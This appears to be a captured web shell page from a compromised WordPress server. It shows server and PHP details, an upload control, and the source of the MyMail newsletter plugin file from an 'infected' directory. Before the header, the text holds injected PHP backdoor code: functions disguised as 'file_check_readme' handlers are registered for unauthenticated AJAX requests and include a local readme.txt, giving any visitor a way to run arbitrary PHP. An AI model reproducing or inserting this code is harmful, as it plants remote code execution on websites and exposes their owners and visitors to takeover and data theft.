if(!function_exists('file_check_readme30367')){ add_action('wp_ajax_nopriv_file_check_readme30367', 'file_check_readme30367'); add_action('wp_ajax_file_check_readme30367', 'file_check_readme30367'); function file_check_readme30367() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme64756')){ add_action('wp_ajax_nopriv_file_check_readme64756', 'file_check_readme64756'); add_action('wp_ajax_file_check_readme64756', 'file_check_readme64756'); function file_check_readme64756() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } HEX
HEX
Server: Apache
System: Linux dx292 6.1.0-39-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.148-1 (2025-08-26) x86_64
User: www-data (33)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Upload Files
File: /data/www/welovefamily.at/welovefamily.at/htdocs_infected/wp-content/plugins/myMail/myMail.php
<?php
/*
Plugin Name: MyMail - Email Newsletter Plugin for WordPress
Plugin URI: https://mymail.newsletter-plugin.com
Plugin Slug: myMail/myMail.php
Description: advanced Newsletter Plugin for WordPress. Create, Send and Track your Newsletter Campaigns
Version: 2.1.33
Author: revaxarts.com
Author URI: https://revaxarts.com
Text Domain: mymail
*/

define( 'MYMAIL_VERSION', '2.1.33' );
define( 'MYMAIL_DBVERSION', 20160125 );
define( 'MYMAIL_DIR', plugin_dir_path( __FILE__ ) );
define( 'MYMAIL_URI', plugin_dir_url( __FILE__ ) );
define( 'MYMAIL_FILE', __FILE__ );
define( 'MYMAIL_SLUG', 'myMail/myMail.php' );

$upload_folder = wp_upload_dir();

define( 'MYMAIL_UPLOAD_DIR', trailingslashit( $upload_folder['basedir'] ) . 'myMail' );
define( 'MYMAIL_UPLOAD_URI', trailingslashit( $upload_folder['baseurl'] ) . 'myMail' );

if ( !file_exists( MYMAIL_DIR . 'includes/functions.php' ) ) {
	return;
}

if ( !function_exists( 'mymail' ) ) {
	require_once MYMAIL_DIR . 'includes/functions.php';
}
require_once MYMAIL_DIR . 'classes/mymail.class.php';

global $mymail_options, $mymail, $mymail_tags, $mymail_mystyles;

$mymail_options = get_option( 'mymail_options', array() );

$mymail = new MyMail();

if ( !$mymail_options ) mymail( 'settings' )->maybe_repair_settings();

if ( !$mymail->wp_mail && mymail_option( 'system_mail' ) == 1 ) {


	/**
	 *
	 *
	 * @param unknown $to
	 * @param unknown $subject
	 * @param unknown $message
	 * @param unknown $headers     (optional)
	 * @param unknown $attachments (optional)
	 * @return unknown
	 */
	function wp_mail( $to, $subject, $message, $headers = '', $attachments = array() ) {
		return mymail()->wp_mail( $to, $subject, $message, $headers, $attachments );
	}


}

if ( !class_exists( 'UpdateCenterPlugin' ) ) {
	require_once MYMAIL_DIR . 'classes/UpdateCenterPlugin.php';
}

UpdateCenterPlugin::add( array(
		'licensecode' => mymail_option( 'purchasecode' ),
		'remote_url' => apply_filters( 'mymail_update_url', 'https://update.revaxarts.com/' ),
		'plugin' => MYMAIL_SLUG,
		'autoupdate' => mymail_option( 'autoupdate', true ),
	) );